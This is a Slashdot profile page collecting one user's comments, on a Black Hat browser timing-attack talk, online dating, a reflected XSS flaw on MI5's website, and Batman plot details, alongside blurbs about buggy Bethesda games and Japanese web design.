Forgot your password?
typodupeerror

Comment: Pixel Perfect Timing Attacks (Score 1) 41

by crowemojo (#44457191) Attached to: Ask Slashdot: Favorite Thing Out of This Year's Black Hat?
Easily one of the best technical talks I have ever seen; how timing attacks can be used to break the same origin policy and read the contents of a frame. This talk included demo's of an attacker site loading up a target site in a frame and reading the contents to grab the CSRF token. It was awesome. http://contextis.co.uk/files/Browser_Timing_Attacks.pdf

Comment: Giant virtual bar (Score 3, Interesting) 630

by crowemojo (#38966097) Attached to: Study: Online Dating Makes People "Picky" and "Unrealistic"
In my experience, the most popular dating sites (listed as type 1 in the article, like OKCupid and Match) are like giant bars. The women are hounded from all directions by men, and the men seem to have to fight to distinguish themselves. Every good friend I know that is female and on one of these sites is constantly bombarded and things quickly devolve into shallow initial impressions. I'm willing to bet most relationships started at bars are often shaky when things get real as well.
Bug

Bethesda Criticized Over Buggy Releases 397

Posted by Soulskill
from the and-don't-kill-off-patrick-stewart-at-the-beginning dept.
SSDNINJA writes "This editorial discusses the habit of Bethesda Softworks to release broken and buggy games with plans to just fix the problems later. Following a trend of similar issues coming up in their games, the author begs gamers to stop supporting buggy games and to spread the idea that games should be finished and quality controlled before release – not weeks after."
The Internet

The Puzzle of Japanese Web Design 242

Posted by kdawson
from the how-to-pack-five-eggs dept.
I'm Not There (1956) writes "Jeffrey Zeldman brings up the interesting issue of the paradox between Japan's strong cultural preference for simplicity in design, contrasted with the complexity of Japanese websites. The post invites you to study several sites, each more crowded than the last. 'It is odd that in Japan, land of world-leading minimalism in the traditional arts and design, Web users and skilled Web design practitioners believe more is more.'"

Comment: A bit misleading ... (Score 5, Informative) 71

by crowemojo (#28880709) Attached to: MI5 Website Breached By Hacker
I see this and think the word "Hacked" gets thrown around a bit too easily. This is an example of non-persistent (also referred to as reflected) cross site scripting. This means that in order to take advantage of it, they have to convince a target to visit their specially crafted link. To me, "Hacked" sort of implies "They got in!" or "Data was breached!" or other such bad things and that simply isn't the case here.

So what does this type of XSS do? Mostly embarass people because defacement examples are posted to "look what I can do" forums (which is basically what happened). Think about the attack vector here, they have to get a victim to visit their specific url that includes their attack. How is that done? Malicious email, posting the link to some website or forum and hoping they find it and visit, embedding the link in other sites that have been hacked or something like a banner ad, or whatever. All of these involve the target going out of their way to visit this maliciously crafted url. When you consider that they could still do all these things without XSS and simply host malicious code themselves, all this reflected XSS is doing is making it a bit harder for an end user to spot that this is something non-standard and dangerous.

Think of it this way, "With reflected XSS, I can send them a link, and if they visit it, I can do bad things to their computer!" but then again, you can do that without XSS too, it just isn't quite as effective. How many users are taking the time to carefully look at a link before clicking on it, checking to make sure it contains the domain name they expect and not just an IP address, or a domain name that is similar, but not quite right, etc. A user who is doing this sort of thing will more likely fall victim to this XSS attack, but most users, who don't scrutinize things at that level, were just as susceptible to a classic phishing/malicious linking attack anyways.

Comment: Re:Major Plotholes ... Spoiler Alert (Score 1) 967

by crowemojo (#24275099) Attached to: Batman Discussion
Your second plothole isn't a plothole at all. Joker was taunting them, "I was here, clearly I couldn't have done this" while making it plain that he was responsible/involved. His "What time is it?" comment is followed by something about depending on the time they would be in one place or several. It's a very clear threat that they are in danger and time is sensitive. I think you are reading more into that scene then is actually there.

I'm a Lisp variable -- bind me!

Working...